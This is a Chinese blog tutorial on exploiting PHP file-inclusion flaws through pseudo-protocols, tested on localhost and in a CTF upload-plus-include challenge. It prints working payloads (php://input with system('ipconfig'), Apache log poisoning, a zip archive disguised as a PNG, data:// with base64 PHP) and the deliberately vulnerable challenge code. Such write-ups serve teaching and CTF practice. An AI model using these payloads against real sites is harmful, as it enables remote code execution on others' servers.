文件包含&PHP伪协议利用

最新推荐文章于 2024-01-11 12:19:31 发布
最新推荐文章于 2024-01-11 12:19:31 发布
阅读量5.1k 收藏 41
点赞数 7
文章标签: php 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45473613/article/details/120325522
版权

文件包含

文件包含漏洞是“代码注入”的一种。其原理就是注入一段用户能控制的脚本或代码,并让服务端执行。“代码注入”的典型代表就是文件包含。

要想成功利用文件包含漏洞进行攻击,需要满足以下两个条件:

  1. Web应用采用include()等文件包含函数通过动态变量的方式引入需要包含的文件;
  2. 用户能够控制该动态变量。

常见的导致文件包含的函数:
PHP:include()、include_once()、require()、require_once()等;
1.php文件包含可以直接执行包含文件的代码,包含的文件格式不受任何限制
在 php 中提供了四个文件包含函数:
(1) Require: 找不到被包含的文件时会产生致命错误(E_COMPILE_ERROR),并停止脚本;
(2) Include:找不到被包含的文件时只会产生一个(E_warinng),脚本将继续执行;
(3) Require_once:与 include 类似会产生警告,区别是如果文件代码已经被包含,则不会再次被包含;

PHP伪协议

php伪协议,事实上是其支持的协议与封装协议。而其支持的协议有:

file:// — 访问本地文件系统

php:// — 访问各个输入/输出流(I/O streams)

data:// — 数据(RFC 2397)

zip:// — 压缩流

在这里插入图片描述

all_url_include在php 5.2以后添加,安全方便的设置(php的默认设置)为:allow_url_fopen=on;all_url_include=off;
allow_url_fopen = On (允许打开URL文件,预设启用)
allow_url_fopen = Off (禁止打开URL文件)
allow_url_include = Off (禁止引用URL文件,新版增加功能,预设关闭)
allow_url_include = On (允许引用URL文件,新版增加功能)

file协议

file:// 文件系统是 PHP 使用的默认封装协议,展现了本地文件系统。

使用file://协议去包含本地的phpinfo.php

http://localhost/www/lfi.php?file=file://F:\phpstudy\phpstudy_pro\WWW\www\phpinfo.php

在这里插入图片描述

PHP协议

php:// 访问各个输入/输出流(I/O streams),在CTF中经常使用的是php://filter和php://input
php://filter用于读取源码:
php://input用于执行php代码。

http://localhost/www/lfi.php?file=php://filter/read=convert.base64-encode/resource=./phpinfo.php

php://filter读取php文件时候需要base64编码
在这里插入图片描述
php://input

  1. allow_url_include = On

php://input + [POST DATA]执行php代码
需要***allow_url_include = On***

http://localhost/www/lfi.php?file=php://input

POST	<?system('ipconfig')?>

在这里插入图片描述

  1. allow_url_include = Off

不过一般大部分情况下,allow_url_include 为默认关闭状态,
就不能包含POST数据了,这种情况下可以包含apache日志或者错误日志记录

首先需要fuzz大法,爆破出日志的路径,

为了测试方便,我先将日志的内容清空,方便演示

访问该网址,通过报错将代码写入日志中
注意:这里要使用burp抓包去访问,不然代码会被url编码写入日志,就不能执行了
也可以将代码写入 user-agent中

http://localhost/www/lfi.php?file=<?php phpinfo();?>

在这里插入图片描述

在这里插入图片描述
我的日志路径为:
F:\phpstudy\phpstudy_pro\Extensions\Apache2.4.39\logs\access.log.1631750400

使用file://伪协议去读取日志,发现phpinfo被成功执行了

http://localhost/www/lfi.php?file=file://F:\phpstudy\phpstudy_pro\Extensions\Apache2.4.39\logs\access.log.1631750400

在这里插入图片描述

zip://协议

** zip:// & bzip2:// & zlib:// **均属于压缩流,可以访问压缩文件中的子文件,更重要的是不需要指定后缀名,可修改为任意后缀:jpg png gif xxx等等。

这里分析一个文件上传和文件包含结合的CTF案例

首先分析文件上传的源代码

<html>
<form action="" enctype="multipart/form-data" method="post" 
name="upload">file:<input type="file" name="file" /><br> 
<input type="submit" value="upload" /></form>

<?php
if(!empty($_FILES["file"]))
{
    echo $_FILES["file"];
    $allowedExts = array("gif", "jpeg", "jpg", "png");
    @$temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if (((@$_FILES["file"]["type"] == "image/gif") || (@$_FILES["file"]["type"] == "image/jpeg")
    || (@$_FILES["file"]["type"] == "image/jpg") || (@$_FILES["file"]["type"] == "image/pjpeg")
    || (@$_FILES["file"]["type"] == "image/x-png") || (@$_FILES["file"]["type"] == "image/png"))
    && (@$_FILES["file"]["size"] < 102400) && in_array($extension, $allowedExts))
    {
        //move_uploaded_file($_FILES["file"]["tmp_name"], "upload/" . $_FILES["file"]["name"]);
        echo "file upload successful!Save in:  " . "upload/" . $_FILES["file"]["name"];
    }
    else
    {
        echo "upload failed!";
    }
}
echo $_FILES["file"]["tmp_name"];
?>
</html>

分析源代码发现,文件上传采用了白名单限制策略,只能上传
“gif", “jpeg”, “jpg”, "png"四种后缀名的文件。

分析文件包含的源代码

<html>
Tips: the parameter is file! :) 
<!-- upload.php -->
</html>
<?php
    @$file = $_GET["file"];
    echo $file;
    if(isset($file))
    {
        if (preg_match('/http|data|ftp|input|%00/i', $file) || strstr($file,"..") !== FALSE || strlen($file)>=70)
        {
            echo "<p> error! </p>";
        }
        else
        {
            include($file.'.php');
        }
    }
?>

分析文件包含源代码,发现限制了部分伪协议和%00截断,且在include中自动添加了php后缀名,但是没有限制zip伪协议。

综上分析可以发现,在文件包含中利用zip伪协议,可以创建test.zip的压缩包,里面放着test.php的文件。

在文件上传时候将后缀名zip修改为png的后缀名,

test.php中写入木马

<?php
phpinfo();
?>

如下图所示
在这里插入图片描述

在这里插入图片描述

图片上传成功之后,利用文件包含和zip://协议去读取test.png中的test.php,发现phpinfo()被执行了,说明poc验证成功

http://172.22.32.25:42715/include.php?file=zip://upload/test.png%23test

在这里插入图片描述

data://

条件:

allow_url_fopen:on
allow_url_include :on

访问网址

http://localhost/www/lfi.php?file=data://text/plain,<?php phpinfo();?>

也可以使用base64编码,防止代码被过滤掉

file=data://text/plain,base64;PD9waHAgcGhwaW5mbygpPz4=
在这里插入图片描述

ps:一人一个屁~~~
2火gENg
关注
第二阶段 PHP代码审计之文件包含
qq_22132931的博客
11-20 792
PHP代码审计之文件包含
PHP伪协议&文件包含漏洞利用
afei001
01-27 332
目录 1.PHP伪协议 1.1 利用条件 1.2 PHP支持的协议和封装协议 1.3 常用的php://filter介绍 2.PHP伪协议利用 (1)php://filter利用读取/执行文件 (2)php://input利用写入文件 (3)file://协议利用读取/执行文件 (4)data://协议利用执行php脚本 (5)http(s)://协议利用读取/执行php脚本 1.PHP伪协议 1.1 利用条件 php.ini中需要开启allow_url_fop...
file 协议
LuckXinXin的博客
04-16 713
其实在一开始接触 html开发,就已经使用了 file 协议 只不过你当时没有“协议”“标准”等这些概念
文件包含漏洞-伪协议
weixin_53303754的博客
10-15 281
File://、php://filter、php://input、data://、http://、phar://、zip://
iwebsec靶场 文件包含漏洞通关笔记8-php://input伪协议利用
mooyuan的博客
09-14 643
php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行,如果存在文件包含漏洞,可将php://input作为文件名传入,同时在post中注入设置想要注入的代码,php执行时就会将post的内容作为php代码执行。
网安入门14-文件包含file:// )
m0_61499194的博客
01-11 1062
文件包含漏洞是指应用程序在加载文件时,允许用户控制被加载文件的名称,从而导致恶意代码的执行或敏感信息的泄露。本地文件包含漏洞(LFI):攻击者可以包含服务器本地的任意文件,包括系统文件、配置文件、数据库文件等。远程文件包含漏洞(RFI):攻击者可以包含远程服务器上的任意文件,包括其他网站的文件、恶意网站的文件等。执行任意代码:攻击者可以通过包含恶意的 PHP 脚本或其他可执行文件来执行任意代码,从而控制服务器。窃取敏感信息:攻击者可以通过包含包含敏感信息的文件来窃取用户的密码、信用卡信息等敏感信息。
php伪协议 文件包含,文件包含漏洞(伪协议利用
weixin_33166692的博客
03-30 1047
实验环境1.已经配置好的WEB服务器2.文件包含页面include.php:文件包含phpinfo(); //一些伪协议的使用需要关注 allow_url_include 和 allow_url_fopen的状态include($_GET['f']);?>3.伪协议利用file伪协议,通过这个协议可以对系统中的文件进行包含,不过一定要是绝对路径1-1php伪协议,有两种类型 input 和 ...
php伪协议读取目录,PHP文件包含,文件读取的利用思路,以及配合伪协议的trick...
weixin_31178795的博客
03-28 1358
PHP文件包含函数有两类,分三种:12file_get_contents()include()/include_once() require/require_once()第一种用于获取文件的数据,第二种用于包含并执行代码与读取文件两种功能php写文件的函数1file_put_contents()基本的思路就是用来写shell吧,不过会有各种限制,但是结合伪协议就可以简单绕过了file_get_...
第十天文件包含漏洞 php伪协议
代码审计
03-15 4335
文件包含漏洞PHP中常见包含文件函数常见文件包含漏洞代码文件包含漏洞的危害文件包含的漏洞的分类本地文件包含**1.上传图片马**2.读取网站源码以及配置文件远程文件包含 什么是文件包含 程序开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件。而无需再次编写,这种 文件调用的过程一般被称为文件包含。 例如:include “conn.phpPHP中常见包含文件函数  include() 当使用该函数包含文件时,只有代码执行到include()函数时才将文件包含
php伪协议漏洞_include(文件包含漏洞,php伪协议)
weixin_39935257的博客
01-17 1100
点击tips查看元素,也并没有有用的信息,联想到题目,include想起了文件包含漏洞。构造payload?file=/../../../../../../flag.php没有返回东西。看完wq学到了一个新姿势:php伪代码构造payload?file=php://filter/read=convert.base64-encode/resource=flag.php使用 "php://filter...
网站安全(7) —— PHP文件包含漏洞介绍
weixin_30677617的博客
05-22 111
  其原理就是注入一段用户能控制的脚本或代码,并让服务端执行。文件包含漏洞可能出现在JSP、PHP、 ASP等语言中,原理都是一样的,本文只介绍PHP文件包含漏洞。      要想成功利用文件包含漏洞进行攻击,需要满足以下两个条件:   1.Web应用采用include()等文件包含函数通过动态变量的方式引入需要包含的文件 (文件包含函数还有 include_once()、require(...
伪协议文件包含常见路径
qq_56426046的博客
08-30 705
php.ini 参数设置 在 php.ini 里有两个重要的参数 allow_url_fopen、allow_url_include。allow_url_fopen:默认值是 ON。允许 url 里的封装协议访问文件;allow_url_include:默认值是 OFF。不允许包含 url 里的封装协议包含文件;...
2016 SWPU 自己做出题目的思路分享
一个码农的笔记
10-31 4037
web1的源码我已经下载好了,地址在:http://download.csdn.net/detail/niexinming/9668799 自己擅长sql注入,而这个题目刚刚适合我http://web1.08067.me 首先这个题目过滤了一大堆东西,比如and,or,空格,%0a,%0b%0c,尤其不能忍的是过滤了逗号,简直是个坑啊 由于过滤了and和or和空格,我用%a0来代替空格,
php文件上传+文件包含(phar伪协议)
WFC1006848997的博客
11-22 5553
test.bugku-web-upload—文件上传与文件包含组合 右键查看源码发现 继续查看源码,提示参数是file,还有一个upload.php 跟进upload.php,是个上传界面 那就可以猜测出是 文件上传与文件包含的组合,所以直接先使用伪协议查看源码,使用的是php://filter协议 php://filter/convert.base64-encode/resource= 首先读取include.php的源码 发现后缀多了一个.php,所以就不加.php了 base64解码 &l
SWPU 2016 web 部分思路整理
Bendawang's Blog
11-01 4100
SWPU 2016 web 部分思路整理
ROS2教程 07 参数Param
m0_56661101的博客
05-19 4098
一、ROS2 服务Service 运行示意图 二、ros2 param ROS2 param下的命令有七条 delete Delete parameter describe Show descriptive information about declared parameters dump Dump the parameters of a node to a yaml file get Get parameter list Output a l
BMZCTF ssrfme 端午节就该吃粽子 pchar???
weixin_52268949的博客
03-27 449
空格等特殊字符如果不进行编码,服务器在处理的时候可能出现问题,通过浏览器的方式访问的话,空格会自动编码为%20或者+,但我们通过上述方法嵌套参数,让服务器自己去请求http的时候就会出现问题,解决方法是进行二次编码。因为第二点说了web服务器默认就会对解析后的参数进行url解码,所以php最开始解析我们的参数时进行了一个解码,服务器通过http伪协议去访问时又会对解析后的参数进行一次解码,所以我们可以进行二次编码。|拼接执行指令\绕过对cat的匹配${IFS}绕过对空格的匹配,?并且长度不能大于70。
iwebsec靶场 文件包含漏洞通关笔记9-file://伪协议利用
mooyuan的博客
09-14 397
file协议也叫本地文件传输协议 ,主要用于访问本地计算机中的文件,就如同在Windows资源管理器中打开文件或者通过右键单击‘打开’一样。基本的格式:file:///文件路径。
【心得】PHP文件包含基本利用个人笔记
uuzeray的博客
11-16 488
include后面跟一个路径,表示要执行的php文件的路径,读取路径中文件内容后,然后执行里面的php代码。/var/www/html/../../../../../../../../../ => / 目录 上溯。即文件路径是php://input,文件内容是/flag(因为没有php标记,所以被当作文本文档处理)ps:不能直接传/flag,/flag为文件的内容,而非文件的路径。/var/www/html/../../../ => / 目录。文件包含漏洞,是指通过文件包含时,包含的内容我们用户可控。
php利用伪协议和 include 向文件中写数据
最新发布
09-07
PHP中的伪协议可以用来访问不同的数据源,比如本地或远程文件。使用include语句结合特定的伪协议,可以实现向文件中写入数据的功能。这种方法通常不是最佳实践,因为它可以带来安全风险,比如可能会被用来执行远程文件包含(RFI)攻击。在正常开发中,应当使用更为安全的方法来处理文件读写操作。 一个简单的例子是使用data:伪协议。这个协议可以创建一个只存在于内存中的数据块,并且可以将其内容当作文件读取。下面是一个简单的示例代码: ```php <?php // 创建一个包含数据的字符串 $data = "这里是写入的数据"; // 使用data:伪协议将数据写入到一个“虚拟”文件中 $file = fopen("data:text/plain," . urlencode($data), 'r'); // 检查文件是否成功打开 if ($file) { // 将“虚拟”文件内容包含进来,这里就是将数据写入到当前的PHP脚本中 include $file; fclose($file); } ?> ``` 在这段代码中,我们首先将要写入的数据编码为URL编码格式,然后将其嵌入到data:伪协议中。接着,使用fopen函数以只读模式打开这个“文件”,并将内容包含进当前的PHP脚本中。这样,我们就把数据“写入”到了文件中。 需要注意的是,尽管这种方法可以实现写入操作,但并不意味着这是一个推荐的实践。在实际开发中,应当使用更安全的文件操作函数如file_put_contents()来处理文件写入。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值